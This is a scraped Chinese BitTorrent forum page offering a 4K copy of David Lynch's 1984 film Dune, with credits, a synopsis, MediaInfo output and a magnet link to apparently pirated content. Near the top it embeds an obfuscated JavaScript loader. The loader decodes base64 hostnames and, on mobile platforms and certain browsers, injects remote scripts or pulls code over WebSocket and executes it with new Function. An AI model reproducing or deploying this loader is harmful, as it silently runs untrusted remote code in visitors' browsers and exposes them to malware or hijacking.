沙丘[中文字幕].Dune.1984.2160p.HDR.UHD.BluRay.DTS.x265-10bit 15.60GB

版主小s 14天前 331

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x62\x50\x73\x42\x6e\x58\x4f\x42\x73\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXlxa2RmODc5Zi5hc2xleXR5LmNvbbSxodHRwczovL29oamZrN2pmMjguZ3Nqemxzc3dzLmNvbbQ==','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['b','O']);}:function(){};

◎译  名 沙丘 / 星际奇兵(港) / 沙丘魔堡(台)
◎片  名 Dune
◎年  代 1984
◎产  地 美国
◎类  别 动作 / 科幻 / 冒险
◎语  言 英语 / 意大利语
◎上映日期 1984-12-01(美国)
◎IMDb链接 https://www.imdb.com/title/tt0087182/
◎豆瓣评分 6.1/10 (4560人评价)
◎豆瓣链接 https://movie.douban.com/subject/1293092/
◎片  长 137 分钟
◎导  演 大卫·林奇 David Lynch (id:1054578)
◎编  剧 大卫·林奇 David Lynch (id:1054578)
       弗兰克·赫伯特 Frank Herbert (id:1028181)
◎演  员 肖恩·杨 Sean Young (id:1041118)
       帕特里克·斯图尔特 Patrick Stewart (id:1010540)
       斯汀 Sting (id:1027320)
       凯尔·麦克拉克伦 Kyle MacLachlan (id:1031874)
       理查德·乔丹 Richard Jordan (id:1110460)
       西尔瓦娜·曼加诺 Silvana Mangano (id:1045174)
       埃沃雷特·麦克吉尔 Everett McGill (id:1027292)
       肯尼思·麦克米伦 Kenneth McMillan (id:1124710)
       简·菲利普斯 Sian Phillips (id:1136006)
       尤尔根·普洛斯诺 Jürgen Prochnow (id:1019048)
       保罗·L·史密斯 Paul L. Smith (id:1009173)
       迪恩·斯托克维尔 Dean Stockwell (id:1031965)
       琳达·亨特 Linda Hunt (id:1000081)
       何塞·费勒 José Ferrer (id:1013979)
       维吉妮娅·马德森 Virginia Madsen (id:1049512)
       艾丽西亚·维特 Alicia Witt (id:1022625)
       大卫·林奇 David Lynch (id:1054578)
       马克斯·冯·叙多夫 Max von Sydow (id:1002675)
       杰克·南斯 Jack Nance (id:1036651)
       弗雷迪·琼斯 Freddie Jones (id:1049921)
       安杰莉卡·阿拉贡 Angélica Aragón (id:1056650)
       何塞·洛佩斯·罗德罗 José López Rodero (id:1290555)
       安东尼·马斯特斯 Anthony Masters (id:1291241)
       本哈明·费勒南戴斯 Benjamín Fernández (id:1283598)
       Pier Luigi Basile Pier Luigi Basile (id:1278043)
       鲍勃·林伍德 Bob Ringwood (id:1295678)
       Mauro Tamagnini Mauro Tamagnini (id:1298871)
       克里斯托弗·塔克 Christopher Tucker (id:1299597)
       路易吉·洛切蒂 Luigi Rocchetti (id:1295838)
       琼·安·布兰克 Jean Ann Black (id:1278717)
       何塞·洛佩斯·罗德罗 José López Rodero (id:1290555)
       Víctor Albarrán Víctor Albarrán (id:1276634)
       克里斯托弗·S·罗斯 Christopher S. Ross (id:1296139)
       布莱恩·史密西斯 Brian Smithies (id:1297958)
       马克·弗伦德 Mark Freund (id:1284190)
       David S. Williams Jr. David S. Williams Jr. (id:1300940)

◎标  签 科幻 / 大卫·林奇 / 美国 / DavidLynch / 沙丘 / 1984 / 美国电影 / 1980s

◎简  介
  故事发生在遥远的未来时代,沙丹四世(何塞·费勒 José Ferrer 饰)是宇宙之王,他靠着自己的强权和武力控制着整个帝国。尽管手握大权,但沙丹四世还是没有安全感,他认为自己的表弟亚崔迪公爵(尤尔根·普洛斯诺 Jürgen Prochnow 饰)企图谋权篡位,因此将他发配到了遥远的凯勒丹行星上。                                    
                                沙丹四世对于亚崔迪公爵的迫害并没有停止,最后,公爵战败自杀,留下妻子和儿子保罗(凯尔·麦克拉克伦 Kyle MacLachlan 饰)流离失所,两人逃到了广袤的沙漠之中,向当地的土著求助。土著们将保罗当做了他们的救世主顶礼膜拜,保罗最终成为了土著领袖,并和名为佳妮(肖恩·杨 Sean Young 饰)的当地女子结为夫妻,然而,复仇的火焰从未在他的心中熄灭过。

◎获奖情况 (共1项)
  第57届奥斯卡金像奖 (1985)
  最佳音响(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 263933949450002350344597071797221354375 (0xC68FD46481C8C93396F07EBE79E86B87)

  4. Complete name                            : [email protected]kv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 15.6 GiB

  8. Duration                                 : 2 h 16 min

  9. Overall bit rate mode                    : Variable

  10. Overall bit rate                         : 16.3 Mb/s

  11. Movie name                               : Dune 1984 2160p HDR UHD BluRay DTS [email protected]

  12. Encoded date                             : UTC 2021-09-01 04:05:31

  13. Writing application                      : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  14. Writing library                          : libebml v1.3.9 + libmatroska v1.5.2


  15. Video

  16. ID                                       : 1

  17. Format                                   : HEVC

  18. Format/Info                              : High Efficiency Video Coding

  19. Format profile                           : Main [email protected]@High

  20. HDR format                               : SMPTE ST 2086, HDR10 compatible

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 2 h 16 min

  23. Bit rate                                 : 14.5 Mb/s

  24. Width                                    : 3 840 pixels

  25. Height                                   : 1 632 pixels

  26. Display aspect ratio                     : 2.35:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.097

  33. Stream size                              : 13.9 GiB (89%)

  34. Title                                    : @HDSky

  35. Writing library                          : x265 - H.265/HEVC codec

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.2020

  40. Transfer characteristics                 : PQ

  41. Matrix coefficients                      : BT.2020 non-constant

  42. Mastering display color primaries        : BT.2020

  43. Mastering display luminance              : min: 0.0020 cd/m2, max: 1000 cd/m2

  44. Maximum Content Light Level              : 739 cd/m2

  45. Maximum Frame-Average Light Level        : 331 cd/m2


  46. Audio

  47. ID                                       : 2

  48. Format                                   : DTS XLL

  49. Format/Info                              : Digital Theater Systems

  50. Commercial name                          : DTS-HD Master Audio

  51. Codec ID                                 : A_DTS

  52. Duration                                 : 2 h 16 min

  53. Bit rate mode                            : Variable

  54. Bit rate                                 : 1 776 kb/s

  55. Channel(s)                               : 6 channels

  56. Channel layout                           : C L R Ls Rs LFE

  57. Sampling rate                            : 48.0 kHz

  58. Frame rate                               : 93.750 FPS (512 SPF)

  59. Bit depth                                : 24 bits

  60. Compression mode                         : Lossless

  61. Stream size                              : 1.69 GiB (11%)

  62. Title                                    : English

  63. Language                                 : English

  64. Default                                  : Yes

  65. Forced                                   : No


  66. Text #1

  67. ID                                       : 3

  68. Format                                   : PGS

  69. Muxing mode                              : zlib

  70. Codec ID                                 : S_HDMV/PGS

  71. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  72. Duration                                 : 2 h 12 min

  73. Bit rate                                 : 26.2 kb/s

  74. Count of elements                        : 2588

  75. Stream size                              : 24.7 MiB (0%)

  76. Title                                    : ENG

  77. Language                                 : English

  78. Default                                  : Yes

  79. Forced                                   : No


  80. Text #2

  81. ID                                       : 4

  82. Format                                   : PGS

  83. Muxing mode                              : zlib

  84. Codec ID                                 : S_HDMV/PGS

  85. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  86. Duration                                 : 2 h 12 min

  87. Bit rate                                 : 14.0 kb/s

  88. Count of elements                        : 2165

  89. Stream size                              : 13.2 MiB (0%)

  90. Title                                    : CHT

  91. Language                                 : Chinese

  92. Default                                  : No

  93. Forced                                   : No


  94. Text #3

  95. ID                                       : 5

  96. Format                                   : PGS

  97. Muxing mode                              : zlib

  98. Codec ID                                 : S_HDMV/PGS

  99. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  100. Duration                                 : 2 h 12 min

  101. Bit rate                                 : 14.3 kb/s

  102. Count of elements                        : 2165

  103. Stream size                              : 13.5 MiB (0%)

  104. Title                                    : CHT

  105. Language                                 : Chinese

  106. Default                                  : No

  107. Forced                                   : No


  108. Menu

  109. 00:00:00.000                             : en:Chapter 01

  110. 00:10:34.133                             : en:Chapter 02

  111. 00:18:22.768                             : en:Chapter 03

  112. 00:30:29.369                             : en:Chapter 04

  113. 00:36:52.210                             : en:Chapter 05

  114. 00:41:47.255                             : en:Chapter 06

  115. 00:54:07.870                             : en:Chapter 07

  116. 01:05:05.819                             : en:Chapter 08

  117. 01:17:27.017                             : en:Chapter 09

  118. 01:33:16.716                             : en:Chapter 10

  119. 01:46:13.450                             : en:Chapter 11

  120. 01:55:12.364                             : en:Chapter 12

  121. 02:01:44.005                             : en:Chapter 13

  122. 02:06:48.935                             : en:Chapter 14



TAGS 动作 冒险 科幻

磁力链:
  • magnet:?xt=urn:btih:EA0832368C65181BA851D2B0F1EFA61357E33C4F
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回